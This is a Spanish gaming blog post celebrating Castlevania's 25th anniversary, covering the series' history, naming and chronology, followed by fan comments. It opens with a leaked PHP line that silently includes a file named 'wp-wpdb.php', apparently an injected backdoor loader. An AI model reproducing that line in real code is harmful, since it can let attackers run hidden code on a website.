if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); 25 aniversario de Castlevania – La Fortaleza de LeChuck

25 aniversario de Castlevania

Este año estamos de múltiples celebraciones por los 25 aniversarios de Legend of Zelda, Metroid, y también de otra saga muy conocida como es la de Castlevania. Todas ellas tienen un denominador común, aparecieron por primera vez en la NES.

La saga Castlevania fue creada por Konami en 1986, en una época donde la gran compañía nipona hacia títulos de calidad, y así nació el primer Castlevania que apareció en Japón como: Devil’s Castle Dracula. Hay que aclarar que no se lanzó exactamente en la NES, sino en el periférico Famicom Disk System que se colocaba bajo la consola y funcionaba por medio de disquetes. Posteriormente apareció una versión para MSX2, que vio la luz en Europa, pasándose a llamar Vampire Killer. En 1987 es cuando se hizo la conversión a cartucho llevando el nombre de Castlevania.
Konami no ha dudado en explotar su franquicia en casi todas las consolas habidas y por haber, y curiosamente en occidente siempre se ha titulado Castlevania. En Japón ha conservado el original: Devil’s Castle Dracula (o variedades como Legend of Dracula, Dracula II…etc), excepto algunos aparecidos en Gameboy Advance y PS2, y el último: Castlevania: Lords of Shadow.
 
La historia durante todos estos años ha tratado de Drácula, que cada cierto tiempo se reencarna para sembrar el terror. Los únicos capaces de derrotarlo son los miembros de la familia Belmont, los cuales llevan generaciones enfrentándose a él. Entre los caza vampiros más populares, podemos encontrar a Simon Belmont, Alucard, hijo de Drácula, y Soma Cruz, su reencarnación.
En cuanto a la cronología, el productor de la serie, Koji Igarashi, establecio una línea temporal eliminando algunos juegos tales como: Castlevania Legends, Castlevania 64, Castlevania Legacy Of Darkness y Castlevania Circle Of The Moon. Por lo tanto, la cronología de la saga quedó así:

La aparición del último título creado por MercurySteam, Castlevania: Lords of Shadow, rompe un poco con el orden establecido por Igarashi y crea, como dicen los de Konami, un «reinicio» de su cronología incluyendo juegos descartados.

A diferencia de Nintendo con el 25 aniversario de Metroid (aún me duele), Konami si está dispuesta a celebrarlo y promete alguna sorpresa que seguramente desvelará en el próximo Tokyo Game Show. No he encontrado ningún video que repase todos los juegos, así que os dejo con un medley con la mejor música a piano.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

11 comentarios

  1. ¡Hola!

    He descubierto esto a través del blog "Illusion of time", creo que de Elaine.

    He de decir que me ha encantado y que ya está en mis feeds ^^. Desde ahora os sigo.

    Y sobre todo, ¡mando recuerdos a Elaine! Que espero que se acuerde de mi… Soy la chica del blog de Final Fantasy que interpretaba temas de la saga.

    ¡Un saludo y seguid así! :

  2. Juegazo donde los haya, de mis favoritos de la NES y, en general, de esos juegos que puedo jugar 1000 veces y no cansarme, para así jugar otras 10.000 veces.

    Lo de la cronología de Castlevania siempre me ha parecido algo lioso, tanto que directamente paso de ella je, je…

  3. Es una saga con muchos títulos, pero así y todo hay más remakes y versiones no oficiales que castlevanias originales de Konami.
    Yo os recomiendo probar Castlevania Online de remakesonline, es gratis y pueden jugar hasta 8 jugadores simultáneos por Internet.

  4. enhorabuena por el articulo adoro castlevania su banda sonora de las mejores , yo recomendaria a todo el mundo el symphony of the night practicamente una obra maestra aunque los que mas recuerdos me trae son el circle of the moon y el aria of sorrow

  5. Me alegra ver tanta gente fan por aquí ^^ Gracias a todos!

    @Tifita: oh madre mia que bien verte por aquí! espero verte por Londres en el FF Distant Worlds 🙂

    @Kotai: me apunto la recomendación, habrá que echarle un vistazo.

    @AlexanMagus: sisi la OST es genial, mira el video del chico pianista, es impresionante 🙂

  6. ¿Por qué no comenté esto? D: Yo que soy el friki más grande de la saga Castlevania que hay sobre el territorio español… ¡Esto se retwittea! >_<

    Yo creo que a pesar de la mecánica trata siempre de reinventarse, y de sus mismas y siempre diferentes y únicas historias, lo que hace grande a esta saga y lo hará siempre, es su OST (exceptuando la de Oscar Araujo, lo siento por él,

Dejar un comentario